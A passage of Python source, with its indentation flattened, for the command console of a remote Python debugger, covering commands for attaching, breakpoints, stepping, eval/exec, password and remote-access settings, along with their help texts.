if bn == os.path.expanduser(bn):
c = text
else:
c = os.path.join(text, '')
if begidx != None:
c = c[begidx:]
return [c]
pl = [dn]
if dn == '':
pl += os.environ['PATH'].split(os.pathsep)
fl = []
for p in pl:
if p == '':
p = '.'
try:
ep = os.path.expanduser(p)
l = os.listdir(ep)
for f in l:
if not f.startswith(bn):
continue
root, ext = os.path.splitext(f)
if not ext in ['.py', '.pyw', '']:
continue
if os.path.isdir(os.path.join(ep, f)):
c = prefix + os.path.join(f, '')
else:
c = prefix + f
if begidx != None:
c = c[begidx:]
fl.append(c)
except:
pass
fs = set(fl)
cl = list(fs)
cl.sort()
return cl
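#
# Completion of eval/exec arguments is computed in the debuggee, so it
# runs on a worker thread bounded by PING_TIMEOUT; if the previous
# completion request is still pending, no completions are offered.
#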
def complete_eval(self, text, line = None, begidx = None, endidx = None):
t = self.m_completion_thread
if t != None and thread_is_alive(t):
return []
self.m_completion_thread = None
result = [('', [])]
if line != None and endidx != None:
text = line[:endidx]
t = threading.Thread(target = self.complete_expression_job, args = (text, result))
t.start()
t.join(PING_TIMEOUT)
if thread_is_alive(t):
self.m_completion_thread = t
return []
(prefix, completions) = result[-1]
if begidx != None:
prefix = prefix[begidx:]
ce = [prefix + c for c in completions]
return ce
complete_v = complete_eval
complete_exec = complete_eval
complete_x = complete_exec
def complete_expression_job(self, text, result):
try:
(prefix, completions) = self.m_session_manager.complete_expression(text)
result.append((prefix, completions))
except:
print_debug_exception()
def run(self):
self.cmdloop()
def __get_str_wrap(self, _str, max_len):
if len(_str) <= max_len and not '\n' in _str:
return (_str, '')
s = _str[: max_len]
i = s.find('\n')
if i == -1:
i = s.rfind(' ')
if i == -1:
return (s, _str[max_len:])
return (_str[: i], _str[i + 1:])
def printer(self, _str):
if not event_is_set(self.m_eInLoop):
self.m_eInLoop.wait()
fAPBM = self.m_fAddPromptBeforeMsg
prefix = ['', self.prompt.strip('\n')][fAPBM] + CONSOLE_PRINTER
suffix = '\n' + [self.prompt.strip('\n'), ''][fAPBM]
s = _str
while s != '':
s, _s = self.__get_str_wrap(s, CONSOLE_WRAP_INDEX - len(prefix + suffix))
_print(prefix + s + suffix, self.m_stdout, feol = False)
s = _s
self.m_stdout.flush()
def print_notice(self, notice):
nl = notice.split('\n')
i = 0
for l in nl:
_print(l, self.m_stdout)
i += 1
if i % PRINT_NOTICE_LINES_PER_SECTION == 0:
_print("\n" + PRINT_NOTICE_PROMPT, self.m_stdout, feol = False)
response = self.stdin.readline()
if response != '\n':
break
_print('', self.m_stdout)
def event_handler(self, event):
state = event.m_state
if (state == STATE_BROKEN) and self.fPrintBroken:
self.fPrintBroken = False
self.printer(STR_DEBUGGER_HAS_BROKEN)
return
if (state != STATE_ANALYZE) and self.fAnalyzeMode:
self.fAnalyzeMode = False
self.prompt = [CONSOLE_PROMPT, ""][self.m_fSplit]
self.printer(STR_ANALYZE_MODE_TOGGLE % MODE_OFF)
return
if (state == STATE_ANALYZE) and not self.fAnalyzeMode:
self.fAnalyzeMode = True
self.prompt = [CONSOLE_PROMPT_ANALYZE, ""][self.m_fSplit]
self.printer(STR_ANALYZE_MODE_TOGGLE % MODE_ON)
return
def synchronicity_handler(self, event):
self.printer(STR_SYNCHRONICITY_MODE % str(event.m_fsynchronicity))
def trap_handler(self, event):
self.printer(STR_TRAP_MODE_SET % str(event.m_ftrap))
def fork_mode_handler(self, event):
x = [FORK_PARENT, FORK_CHILD][event.m_ffork_into_child]
y = [FORK_MANUAL, FORK_AUTO][event.m_ffork_auto]
self.printer(STR_FORK_MODE_SET % (x, y))
def do_launch(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
if arg[:2] == '-k':
fchdir = False
_arg = arg[2:].strip()
else:
fchdir = True
_arg = arg
self.fPrintBroken = True
try:
self.m_session_manager.launch(fchdir, _arg)
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % arg)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def do_restart(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.restart()
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % arg)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def do_attach(self, arg):
if arg == '':
return self.__scripts(arg)
self.fPrintBroken = True
try:
self.m_session_manager.attach(arg)
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def __scripts(self, arg):
if self.m_session_manager.get_password() is None:
_print(STR_PASSWORD_MUST_BE_SET, self.m_stdout)
return
host = self.m_session_manager.get_host()
_print(STR_SCRIPTS_CONNECTING % host, self.m_stdout)
(server_list, errors) = self.m_session_manager.calc_server_list()
if server_list == []:
_print(STR_SCRIPTS_NO_SCRIPTS % host, self.m_stdout)
return
try:
spid = self.m_session_manager.get_server_info().m_pid
except NotAttached:
spid = None
_print(STR_SCRIPTS_TO_DEBUG % host, self.m_stdout)
for s in server_list:
m = ['', SYMBOL_MARKER][spid == s.m_pid]
_print(' %1s %-5d %s' % (m, s.m_pid, s.m_filename), self.m_stdout)
def do_detach(self, arg):
if not arg == '':
self.printer(STR_BAD_ARGUMENT)
return
self.m_session_manager.detach()
def do_host(self, arg):
if arg == '':
host = self.m_session_manager.get_host()
_print(host, self.m_stdout)
return
try:
self.m_session_manager.set_host(arg)
except socket.gaierror:
e = sys.exc_info()[1]
self.printer(MSG_ERROR_HOST_TEXT % (arg, e))
def do_break(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
self.m_session_manager.request_break()
do_b = do_break
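#
# Parse a breakpoint argument of the form
#   [<filename>':'] (<lineno> | <scope>) [',' <expr>]
# into its (filename, scope, lineno, expr) components. An empty
# filename falls back to the current file (self.m_filename).
#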
def __parse_bp_arg(self, arg, fAllowExpr = True):
_args = arg.split(BP_EVAL_SEP)
if (len(_args) > 1) and (not fAllowExpr):
raise BadArgument
if len(_args) > 1:
expr = _args[1].strip()
else:
expr = ''
rf = _args[0].rfind(BP_FILENAME_SEP)
if rf == -1:
args = [_args[0]]
else:
args = [_args[0][:rf], _args[0][rf + 1:]]
filename = ['', args[0]][len(args) > 1]
if filename in [None, '']:
filename = self.m_filename
try:
lineno = int(args[-1])
scope = ''
except ValueError:
lineno = 0
scope = args[-1].strip()
return (filename, scope, lineno, expr)
def do_go(self, arg):
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
if arg != '':
(filename, scope, lineno, expr) = self.__parse_bp_arg(arg, fAllowExpr = False)
self.fPrintBroken = True
self.m_session_manager.request_go_breakpoint(filename, scope, lineno)
return
self.fPrintBroken = True
self.m_session_manager.request_go()
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % filename)
except InvalidScopeName:
self.printer(STR_SCOPE_NOT_FOUND % scope)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
do_g = do_go
def do_step(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_step()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_s = do_step
def do_next(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_next()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_n = do_next
def do_return(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_return()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_r = do_return
def do_jump(self, arg):
try:
lineno = int(arg)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.request_jump(lineno)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_j = do_jump
def do_bp(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
(filename, scope, lineno, expr) = self.__parse_bp_arg(arg, fAllowExpr = True)
self.m_session_manager.set_breakpoint(filename, scope, lineno, True, expr)
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % filename)
except InvalidScopeName:
self.printer(STR_SCOPE_NOT_FOUND % scope)
except SyntaxError:
self.printer(STR_BAD_EXPRESSION % expr)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def do_be(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.enable_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bd(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.disable_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bc(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.delete_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bl(self, arg):
bpl = self.m_session_manager.get_breakpoints()
bplk = list(bpl.keys())
bplk.sort()
_print(STR_BREAKPOINTS_LIST, self.m_stdout)
for id in bplk:
bp = bpl[id]
if bp.m_expr:
expr = bp.m_expr
else:
expr = ''
try:
expr.encode('ascii', 'strict')
encoding = ''
except:
encoding = bp.m_encoding
scope = bp.m_scope_fqn
if scope.startswith(MODULE_SCOPE + '.'):
scope = scope[len(MODULE_SCOPE) + 1:]
elif scope.startswith(MODULE_SCOPE2 + '.'):
scope = scope[len(MODULE_SCOPE2) + 1:]
state = [STATE_DISABLED, STATE_ENABLED][bp.isEnabled()]
s = STR_BREAKPOINTS_TEMPLATE % (id, state, bp.m_lineno, clip_filename(bp.m_filename, 45), calc_suffix(scope, 45), calc_prefix(expr, 50), encoding)
_print(s.rstrip() + '\n', self.m_stdout)
def do_save(self, arg):
self.m_session_manager.save_breakpoints(arg)
_print(STR_BREAKPOINTS_SAVED, self.m_stdout)
return
def do_load(self, arg):
try:
self.m_session_manager.load_breakpoints(arg)
_print(STR_BREAKPOINTS_LOADED, self.m_stdout)
return
except IOError:
error = [STR_BREAKPOINTS_FILE_NOT_FOUND, STR_BREAKPOINTS_NOT_FOUND][arg == '']
self.printer(error)
def do_stack(self, arg):
if self.fAnalyzeMode and (arg != ''):
self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
return
try:
tid_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
tid_list = [int(sid) for sid in sid_list]
sl = self.m_session_manager.get_stack(tid_list, fAll)
if len(sl) == 0:
self.printer(STR_NO_THREADS_FOUND)
return
frame_index = self.m_session_manager.get_frame_index()
m = None
for st in sl:
s = st.get(DICT_KEY_STACK, [])
tid = st.get(DICT_KEY_TID, 0)
fBroken = st.get(DICT_KEY_BROKEN, False)
fCurrent = st.get(DICT_KEY_CURRENT_TID, False)
if m is not None:
_print('', self.m_stdout)
_print(STR_STACK_TRACE % tid, self.m_stdout)
i = 0
while i < len(s):
e = s[-(1 + i)]
marker = [SOURCE_STATE_UNBROKEN, SYMBOL_MARKER][fBroken]
if fCurrent:
m = ['', marker][i == frame_index]
else:
m = ['', marker][i == 0]
_print(' %1s %5d %-28s %4d %s' % (m, i, calc_suffix(e[0], 28), e[1], calc_prefix(e[2], 20)), self.m_stdout)
i += 1
except ValueError:
self.printer(STR_BAD_ARGUMENT)
except (NoExceptionFound, NoThreads):
self.m_session_manager.report_exception(*sys.exc_info())
do_k = do_stack
def do_list(self, arg):
rf = arg.rfind(BP_FILENAME_SEP)
if rf == -1:
_filename = ''
__args2 = arg
else:
_filename = arg[:rf]
__args2 = arg[rf + 1:]
_args = __args2.split(BP_EVAL_SEP)
fAll = (_args[0] == SYMBOL_ALL)
fMore = (_args[0] == SOURCE_MORE)
fLess = (_args[0] == SOURCE_LESS)
fEntire = (_args[0] == SOURCE_ENTIRE_FILE)
fCurrent = (_args[0] == '')
fLine = False
l = 1
try:
if len(_args) > 1:
nlines = int(_args[1])
else:
nlines = self.m_last_nlines
if not (fAll or fMore or fLess or fEntire or fCurrent):
l = int(_args[0])
fLine = True
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode and fAll:
self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
return
if fMore and self.m_last_source_line:
l = max(1, self.m_last_source_line + self.m_last_nlines // 2 + 1)
fLine = True
elif fLess and self.m_last_source_line:
l = max(1, self.m_last_source_line - (self.m_last_nlines - 1) // 2 - nlines)
fLine = True
try:
if fEntire:
r = [self.m_session_manager.get_source_file(_filename, -1, -1)]
elif fLine:
r = [self.m_session_manager.get_source_file(_filename, l, nlines)]
elif _filename != '':
r = [self.m_session_manager.get_source_file(_filename, l, nlines)]
else:
r = self.m_session_manager.get_source_lines(nlines, fAll)
if len(r) == 0:
self.printer(STR_NO_THREADS_FOUND)
return
m = None
for d in r:
tid = d.get(DICT_KEY_TID, 0)
filename = d.get(DICT_KEY_FILENAME, '')
breakpoints = d.get(DICT_KEY_BREAKPOINTS, {})
source_lines = d.get(DICT_KEY_LINES, [])
first_lineno = d.get(DICT_KEY_FIRST_LINENO, 0)
if len(r) == 1 and first_lineno != 0:
l = first_lineno
fBroken = d.get(DICT_KEY_BROKEN, False)
frame_event = d.get(DICT_KEY_EVENT, '')
frame_lineno = d.get(DICT_KEY_FRAME_LINENO, 0)
if m is not None:
_print('', self.m_stdout)
_print(STR_SOURCE_LINES % (tid, filename), self.m_stdout)
for i, line in enumerate(source_lines):
lineno = first_lineno + i
if lineno != frame_lineno:
m = ''
elif not fBroken:
m = SOURCE_STATE_UNBROKEN + SYMBOL_MARKER
elif frame_event == 'call':
m = SOURCE_EVENT_CALL + SYMBOL_MARKER
elif frame_event == 'line':
m = SOURCE_EVENT_LINE + SYMBOL_MARKER
elif frame_event == 'return':
m = SOURCE_EVENT_RETURN + SYMBOL_MARKER
elif frame_event == 'exception':
m = SOURCE_EVENT_EXCEPTION + SYMBOL_MARKER
if breakpoints.get(lineno, None) == STATE_ENABLED:
b = SOURCE_BP_ENABLED
elif breakpoints.get(lineno, None) == STATE_DISABLED:
b = SOURCE_BP_DISABLED
else:
b = ''
line = line.replace('\t', ' ' * PYTHON_TAB_WIDTH)
_print(' %2s %1s %5d %s' % (m, b, lineno, calc_prefix(line[:-1], 60)), self.m_stdout)
if fAll or fEntire:
self.m_last_source_line = None
elif len(source_lines) != 0:
self.m_last_source_line = [l + (nlines - 1) // 2, frame_lineno][l == -1]
self.m_last_nlines = nlines
except (InvalidFrame, IOError):
self.printer(STR_SOURCE_NOT_FOUND)
except (NoExceptionFound, NoThreads):
self.m_session_manager.report_exception(*sys.exc_info())
do_l = do_list
def do_up(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
fi = self.m_session_manager.get_frame_index()
self.m_session_manager.set_frame_index(fi - 1)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def do_down(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
fi = self.m_session_manager.get_frame_index()
self.m_session_manager.set_frame_index(fi + 1)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
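#
# eval/exec are potentially blocking remote calls, so they are issued
# from worker threads; if a call does not finish within
# WAIT_FOR_BREAK_TIMEOUT, a warning is printed and the result is
# reported asynchronously when it arrives.
#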
def evaluate_job(self, sync_event, expr):
try:
(value, warning, error) = self.m_session_manager.evaluate(expr)
if warning:
self.printer(STR_WARNING % warning)
if error:
_print(error + '\n', self.m_stdout)
_print(value, self.m_stdout)
if event_is_set(sync_event):
_print(self.prompt, self.m_stdout, feol = False)
return
except (NoExceptionFound, DebuggerNotBroken):
self.m_session_manager.report_exception(*sys.exc_info())
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
def do_eval(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
sync_event = threading.Event()
t = threading.Thread(target = self.evaluate_job, args = (sync_event, arg))
t.start()
t.join(WAIT_FOR_BREAK_TIMEOUT)
if thread_is_alive(t):
_print(STR_OUTPUT_WARNING_ASYNC, self.m_stdout)
sync_event.set()
do_v = do_eval
def execute_job(self, sync_event, suite):
try:
(warning, error) = self.m_session_manager.execute(suite)
if warning:
self.printer(STR_WARNING % warning)
if error:
_print(error + '\n', self.m_stdout)
if event_is_set(sync_event):
_print(self.prompt, self.m_stdout, feol = False)
return
except (NoExceptionFound, DebuggerNotBroken):
self.m_session_manager.report_exception(*sys.exc_info())
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
def do_exec(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
_print(STR_OUTPUT_WARNING, self.m_stdout)
sync_event = threading.Event()
t = threading.Thread(target = self.execute_job, args = (sync_event, arg))
t.start()
t.join(WAIT_FOR_BREAK_TIMEOUT)
if thread_is_alive(t):
_print(STR_OUTPUT_WARNING_ASYNC, self.m_stdout)
sync_event.set()
do_x = do_exec
def do_encoding(self, arg):
if arg == '':
encoding, fraw = self.m_session_manager.get_encoding()
if encoding != ENCODING_AUTO:
try:
codecs.lookup(encoding)
except:
encoding += ' (?)'
if fraw:
encoding += ', ' + ENCODING_RAW
_print(STR_ENCODING_MODE % encoding, self.m_stdout)
return
if ',' in arg:
encoding, raw = arg.split(',')
else:
encoding, raw = arg, ''
encoding = encoding.strip()
if encoding == '':
encoding, fraw = self.m_session_manager.get_encoding()
fraw = 'raw' in raw
self.m_session_manager.set_encoding(encoding, fraw)
if encoding != ENCODING_AUTO:
try:
codecs.lookup(encoding)
except:
encoding += ' (?)'
_print(STR_ENCODING_BAD, self.m_stdout)
if fraw:
encoding += ', ' + ENCODING_RAW
_print(STR_ENCODING_MODE_SET % encoding, self.m_stdout)
def do_thread(self, arg):
if self.fAnalyzeMode and (arg != ''):
self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
return
try:
if arg != '':
tid = int(arg)
self.m_session_manager.set_thread(tid)
_print(STR_THREAD_FOCUS_SET, self.m_stdout)
return
(current_thread_id, tl) = self.m_session_manager.get_thread_list()
_print(STR_ACTIVE_THREADS, self.m_stdout)
for i, t in enumerate(tl):
m = ['', SYMBOL_MARKER][t[DICT_KEY_TID] == current_thread_id]
state = [STATE_RUNNING, STR_STATE_BROKEN][t[DICT_KEY_BROKEN]]
_print(' %1s %3d %5d %-15s %s' % (m, i, t[DICT_KEY_TID], t[DICT_KEY_NAME], state[:25]), self.m_stdout)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
except ThreadNotFound:
self.printer(STR_THREAD_NOT_FOUND)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_t = do_thread
def do_analyze(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.set_analyze(not self.fAnalyzeMode)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_a = do_analyze
def do_synchro(self, arg):
if arg == '':
fsynchronicity = self.m_session_manager.get_synchronicity()
_print(STR_SYNCHRONICITY_MODE % str(fsynchronicity), self.m_stdout)
return
if arg == str(True):
fsynchronicity = True
elif arg == str(False):
fsynchronicity = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_synchronicity(fsynchronicity)
def do_trap(self, arg):
if arg == '':
ftrap = self.m_session_manager.get_trap_unhandled_exceptions()
_print(STR_TRAP_MODE % str(ftrap), self.m_stdout)
return
if arg == str(True):
ftrap = True
elif arg == str(False):
ftrap = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_trap_unhandled_exceptions(ftrap)
def do_fork(self, arg):
(ffork_into_child, ffork_auto) = self.m_session_manager.get_fork_mode()
if arg == '':
x = [FORK_PARENT, FORK_CHILD][ffork_into_child]
y = [FORK_MANUAL, FORK_AUTO][ffork_auto]
_print(STR_FORK_MODE % (x, y), self.m_stdout)
return
arg = arg.lower()
if FORK_PARENT in arg:
ffork_into_child = False
elif FORK_CHILD in arg:
ffork_into_child = True
if FORK_AUTO in arg:
ffork_auto = True
elif FORK_MANUAL in arg:
ffork_auto = False
self.m_session_manager.set_fork_mode(ffork_into_child, ffork_auto)
def do_password(self, arg):
if arg == '':
_rpdb2_pwd = self.m_session_manager.get_password()
if _rpdb2_pwd is None:
_print(STR_PASSWORD_NOT_SET, self.m_stdout)
else:
_print(STR_PASSWORD_SET % _rpdb2_pwd, self.m_stdout)
return
_rpdb2_pwd = arg.strip('"\'')
try:
self.m_session_manager.set_password(_rpdb2_pwd)
_print(STR_PASSWORD_SET % _rpdb2_pwd, self.m_stdout)
except BadArgument:
_print(STR_PASSWORD_BAD, self.m_stdout)
def do_remote(self, arg):
if arg == '':
fAllowRemote = self.m_session_manager.get_remote()
_print(STR_REMOTE_MODE % str(fAllowRemote), self.m_stdout)
return
if arg == str(True):
fAllowRemote = True
elif arg == str(False):
fAllowRemote = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_remote(fAllowRemote)
_print(STR_REMOTE_MODE % str(fAllowRemote), self.m_stdout)
def do_env(self, arg):
env = self.m_session_manager.get_environ()
if arg == '':
if len(env) == 0:
_print(STR_ENVIRONMENT_EMPTY, self.m_stdout)
return
_print(STR_ENVIRONMENT, self.m_stdout)
for k, v in env:
_print('%s=%s' % (k, v), self.m_stdout)
return
if arg[:2] == '-d':
k = arg[2:].strip()
_env = [(_k, _v) for (_k, _v) in env if _k != k]
self.m_session_manager.set_environ(_env)
return
try:
k, v = arg.split('=')
k = k.strip()
v = v.strip()
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
_env = [(_k, _v) for (_k, _v) in env if _k != k]
_env.append((k, v))
self.m_session_manager.set_environ(_env)
def do_stop(self, arg):
self.m_session_manager.stop_debuggee()
def do_exit(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.m_session_manager.get_state() != STATE_DETACHED:
try:
self.do_stop('')
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
_print('', self.m_stdout)
return True
do_EOF = do_exit
def do_copyright(self, arg):
self.print_notice(COPYRIGHT_NOTICE)
def do_license(self, arg):
self.print_notice(LICENSE_NOTICE + COPY_OF_THE_GPL_LICENSE)
def do_credits(self, arg):
self.print_notice(CREDITS_NOTICE)
def do_help(self, arg):
cmd.Cmd.do_help(self, arg)
if arg == '':
help_notice = """Security:
----------------
password - Get or set the channel password.
remote - Get or set "allow connections from remote machines" mode.
Session Control:
-----------------
env - Display or set the environment setting for new sessions.
host - Display or change host.
attach - Display scripts or attach to a script on host.
detach - Detach from script.
launch - Start a script and attach to it.
restart - Restart a script.
stop - Shutdown the debugged script.
exit - Exit from debugger.
Debuggee Control:
-----------------
break - Request an immediate break.
step - Continue to the next execution line.
next - Continue to the next execution line in the current frame.
return - Continue until the debugger is about to return from the frame.
jump - Jump to a line in the current scope.
go - Continue execution.
Breakpoints Control:
--------------------
bp - Set a break point.
bd - Disable a breakpoint.
be - Enable a breakpoint.
bc - Clear (delete) a breakpoint.
bl - List all breakpoints.
load - Load session breakpoints.
save - Save session breakpoints.
Misc:
-----
thread - Display threads or switch to a particular thread.
list - List source code.
stack - Display stack trace.
up - Go up one frame in stack.
down - Go down one frame in stack.
encoding - Set the source encoding used by exec and eval commands.
eval - Evaluate expression in the context of the current frame.
exec - Execute suite in the context of the current frame.
analyze - Toggle analyze last exception mode.
trap - Get or set "trap unhandled exceptions" mode.
fork - Get or set fork handling mode.
synchro - Get or set synchronicity mode.
License:
----------------
copyright - Print copyright notice.
license - Print license.
credits - Print credits information.
Type help <topic> for further information."""
self.print_notice(help_notice)
def help_copyright(self):
_print("""copyright
Print copyright notice.""", self.m_stdout)
def help_license(self):
_print("""license
Print license.""", self.m_stdout)
def help_credits(self):
_print("""credits
Print credits information.""", self.m_stdout)
def help_help(self):
_print("""help <cmd>
Print help for command <cmd>.
On the other hand I guess that you already know that, don't you?""", self.m_stdout)
def help_analyze(self):
_print("""analyze
(shorthand - a)
Toggle analyze last exception mode.
The following changes to the debugger behavior apply in analyze mode:
The debugger prompt changes to 'Analyze>'.
'go', 'step', 'next', and 'return' are not allowed.
'thread' does not allow to change the thread focus.
'stack' allows no arguments.
'list' does not accept the '*' (all threads) argument.
'stack', 'list', 'eval', 'exec', 'up', and 'down' operate on the thrown
exception.""", self.m_stdout)
help_a = help_analyze
def help_password(self):
_print("""password <password>
Get or set the channel password.
Communication between the console and the debuggee is always authenticated and
optionally encrypted. The password (a secret known to the console and the
debuggee alone) governs both security methods. The password is never
communicated between the two components on the communication channel.
A password is always required since unsecured communication between the
console and the debuggee might expose your machine to attacks.""", self.m_stdout)
def help_remote(self):
_print("""remote [True | False]
Get or set "allow connections from remote machines" mode.
When set to False:
Newly launched debuggees will listen on localhost only. In this mode, debugger
consoles on remote machines will NOT BE able to see or attach to the debuggee.
When set to True:
Newly launched debuggees will listen on INADDR_ANY. In this mode, debugger
consoles on remote machines will BE able to see and attach to the debuggee.""", self.m_stdout)
def help_trap(self):
_print("""trap [True | False]
Get or set "trap unhandled exceptions" mode.
When set to False:
Debuggee will ignore unhandled exceptions.
When set to True:
Debuggee will pause on unhandled exceptions for inspection.""", self.m_stdout)
def help_synchro(self):
_print("""synchro [True | False]
Get or set the synchronicity mode.
Traditional Python debuggers that use the inspected thread
(usually the main thread) to query or modify the script
name-space have to wait until the script hits a break-point.
Synchronicity allows the debugger to query and modify the
script name-space even if its threads are still running or
blocked in C library code by using special worker threads.
In some rare cases querying or modifying data in
synchronicity can crash the script. For example in some
Linux builds of wxPython querying the state of wx objects
from a thread other than the GUI thread can crash the
script. If this happens or if you want to restrict these
operations to the inspected thread, turn synchronicity off.
Default is True.""", self.m_stdout)
def help_fork(self):
_print("""fork [parent | child] [manual | auto]
Get or set fork handling mode.
Without arguments returns the current mode.
When 'parent' is specified the debugger will continue to debug the original
parent process after a fork.
When 'child' is specified the debugger will switch to debug the forked
child process after a fork.
When 'manual' is specified the debugger will pause before doing a fork.
When 'auto' is specified the debugger will go through the fork without
pausing and will make the forking decision based on the parent/child
setting.
WARNING:
On some Posix OS, such as FreeBSD, stepping into the child fork
can result in termination of the child process since the debugger
uses threading for its operation and on these systems threading and
forking can conflict.
""", self.m_stdout)
def help_stop(self):
_print("""stop
Shutdown the debugged script.""", self.m_stdout)
def help_launch(self):
_print("""launch [-k] <script_name> [<script_args>]
Start script <script_name> and attach to it.
-k Don't change the current working directory. By default the working
directory of the launched script is set to its folder.""", self.m_stdout)
def help_restart(self):
_print("""restart
Restart a script with same arguments from last launch.""", self.m_stdout)
def help_attach(self):
_print("""attach [<arg>]
Without an argument, 'attach' prints the scripts available for debugging
on the selected host. To select a host use the 'host' command. A script is
considered available for debugging only if it is using the rpdb2 module or
has been executed by the debugger.
If the debugger is already attached to a script, a special character will
mark that script in the list.
When <arg> is an integer the debugger will try to attach to a script with
that pid.
When <arg> is a string the debugger will try to attach to a script
with that name in the list.""", self.m_stdout)
def help_detach(self):
_print("""detach
Detach from the script the debugger is currently attached to. The detached
script will continue execution.""", self.m_stdout)
def help_break(self):
_print("""break
(shorthand - b)
Request script to break (pause execution as if it hit a breakpoint).
The 'break' command returns immediately, but the break is only established
when an active thread submits to the debugger control. If a thread is
doing a system call or executing C code, this will happen only when
it returns to executing Python code.""", self.m_stdout)
help_b = help_break
def help_bp(self):
_print("""bp [<filename>':'] (<line> | <scope>) [',' <expr>]
Set a breakpoint.
<filename> - either the filename or the module name.
<line> - is the line number to assign the breakpoint to.
<scope> - is a "fully qualified" function name. That is, not only the
function name but also the class name (in case of a member
function), such as MyClass.MyMemberFunction.
<expr> - condition to evaluate in the context of the frame. If it
evaluates to 'True' the break point will break into the debugger.
If <filename> is omitted, the current file is assumed. In this case
the debuggee has to be waiting at break point.
Examples:
bp test_file.py:20
bp test_file.py:MyClass.Foo
bp 304
Type 'help break' for more information on breakpoints and threads.""", self.m_stdout)
def help_be(self):
_print("""be (<id_list> | '*')
Enable breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - Enable all breakpoints.""", self.m_stdout)
def help_bd(self):
_print("""bd (<id_list> | '*')
Disable breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - disable all breakpoints.""", self.m_stdout)
def help_bc(self):
_print("""bc (<id_list> | '*')
Clear (delete) breakpoints.
